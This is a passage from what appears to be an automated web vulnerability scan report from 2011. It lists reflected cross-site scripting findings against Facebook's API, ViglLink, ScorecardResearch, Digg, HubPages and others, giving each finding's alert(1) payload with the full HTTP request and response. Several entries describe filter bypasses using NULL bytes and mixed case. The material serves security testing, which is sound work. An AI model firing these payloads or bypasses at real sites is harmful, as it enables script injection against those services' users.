mP6!!!!$<lise!#naX!!!!'<m8qE!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#ne$!!!!$<lP]'!#p#b!!!!'<m8qE!#p9d!!!!#<lj09!#pD8!!!!'<m8>B!#sx#!!!!3<m9Vd"

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:17:00 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Fri, 11 Feb 2011 18:17:00 GMT
Pragma: no-cache
Content-Length: 4645
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?95cdf"-alert(1)-"14e796c9f61=1&Z=728x90&s=1333214&_salt=2292189709";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...
1.61. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7 was submitted in the method parameter. This input was echoed as 5381e<img src=a onerror=alert(1)>9d6042fa9f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:20 GMT
Content-Length: 360

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats5381e<img src=a onerror=alert(1)>9d6042fa9f7"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});
1.62. http://api.facebook.com/restserver.php [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9 was submitted in the urls parameter. This input was echoed as 8585e<img src=a onerror=alert(1)>f213777d1e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 11 Feb 2011 10:17:39 -0800
Pragma:
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Length: 376

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]8585e<img src=a onerror=alert(1)>f213777d1e9"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});
1.63. http://api.viglink.com/api/ping [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 7e217<script>alert(1)</script>53abc6bf11f was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=2b0adaafa9ad8a29fede7758fada17307e217<script>alert(1)</script>53abc6bf11f&loc=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F219333%2Fonline_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%3Dhp_fv&v=1&jsonp=vglnk_jsonp_12974526338310 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 11 Feb 2011 19:30:09 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 97

error: Unknown api key: 2b0adaafa9ad8a29fede7758fada17307e217<script>alert(1)</script>53abc6bf11f
1.64. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 1d93c<script>alert(1)</script>f83ad48726e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=81d93c<script>alert(1)</script>f83ad48726e&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"81d93c<script>alert(1)</script>f83ad48726e", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
1.65. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 7e92c<script>alert(1)</script>29a2dc4c34a was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15=7e92c<script>alert(1)</script>29a2dc4c34a HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"7e92c<script>alert(1)</script>29a2dc4c34a", c16:"", r:""});
1.66. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 24c33<script>alert(1)</script>f3089f61a81 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=603514524c33<script>alert(1)</script>f3089f61a81&c3=4845000000000000003&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"603514524c33<script>alert(1)</script>f3089f61a81", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
1.67. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 95862<script>alert(1)</script>76f209dab7e was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=484500000000000000395862<script>alert(1)</script>76f209dab7e&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"484500000000000000395862<script>alert(1)</script>76f209dab7e", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
1.68. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 24119<script>alert(1)</script>6e5828325a3 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=24119<script>alert(1)</script>6e5828325a3&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"24119<script>alert(1)</script>6e5828325a3", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
1.69. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 8f81a<script>alert(1)</script>dff6d8e6cce was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=8f81a<script>alert(1)</script>dff6d8e6cce&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
re;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"8f81a<script>alert(1)</script>dff6d8e6cce", c6:"", c10:"", c15:"", c16:"", r:""});
1.70. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 28803<script>alert(1)</script>08c6fcd7d5f was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=28803<script>alert(1)</script>08c6fcd7d5f&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"28803<script>alert(1)</script>08c6fcd7d5f", c10:"", c15:"", c16:"", r:""});
1.71. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://copypasta.credibl.es
Path:   /stylesheets/compiled/copypasta.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae30b<script>alert(1)</script>9f79a2b85ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/compiledae30b<script>alert(1)</script>9f79a2b85ca/copypasta.css?v=2 HTTP/1.1
Host: copypasta.credibl.es
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/apple/news/2011/02/six-minute-keychain-hack-highlights-busted-iphone-security-model.ars
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 11 Feb 2011 19:22:14 GMT
Content-Type: text/plain
Connection: keep-alive
X-Cascade: pass
Content-Length: 93
X-Varnish: 1676992181
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/compiledae30b<script>alert(1)</script>9f79a2b85ca/copypasta.css
1.72. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://copypasta.credibl.es
Path:   /stylesheets/compiled/copypasta.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ae7a8<script>alert(1)</script>a9785df6772 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/compiled/copypasta.cssae7a8<script>alert(1)</script>a9785df6772?v=2 HTTP/1.1
Host: copypasta.credibl.es
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/apple/news/2011/02/six-minute-keychain-hack-highlights-busted-iphone-security-model.ars
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 11 Feb 2011 19:22:16 GMT
Content-Type: text/plain
Connection: keep-alive
X-Cascade: pass
Content-Length: 93
X-Varnish: 3841015658
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/compiled/copypasta.cssae7a8<script>alert(1)</script>a9785df6772
1.73. http://digg.com/remote-submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /remote-submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb was submitted in the REST URL parameter 1. This input was echoed as 74e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /remote-submit%0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:08:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sat, 12-Feb-2011 21:08:37 GMT; path=/; domain=digg.com
Set-Cookie: d=8c53a5f3d0217831cca27dd9a043299858a02c2ad24e2c437b53eb8a7149e65f; expires=Thu, 11-Feb-2021 07:16:17 GMT; path=/; domain=.digg.com
X-Digg-Time: D=241537 10.2.129.78
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15632

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb.rss">
...[SNIP]...
1.74. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cf201"><script>alert(1)</script>56f50e4da51 was submitted in the REST URL parameter 1. This input was echoed as cf201"><script>alert(1)</script>56f50e4da51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /submit%00cf201"><script>alert(1)</script>56f50e4da51 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:08:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sat, 12-Feb-2011 21:08:08 GMT; path=/; domain=digg.com
Set-Cookie: d=7790e3bcd773131188588be60902b297e1566c5c2d8e4567c363f32a95040d0e; expires=Thu, 11-Feb-2021 07:15:48 GMT; path=/; domain=.digg.com
X-Digg-Time: D=220052 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15613

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00cf201"><script>alert(1)</script>56f50e4da51.rss">
...[SNIP]...
1.75. http://hubpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548f8"><script>alert(1)</script>9a7d90ba46e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?548f8"><script>alert(1)</script>9a7d90ba46e=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 29252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/?548f8"><script>alert(1)</script>9a7d90ba46e=1', 'HubPages'); return false;">
...[SNIP]...
1.76. http://hubpages.com/about/advertise [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
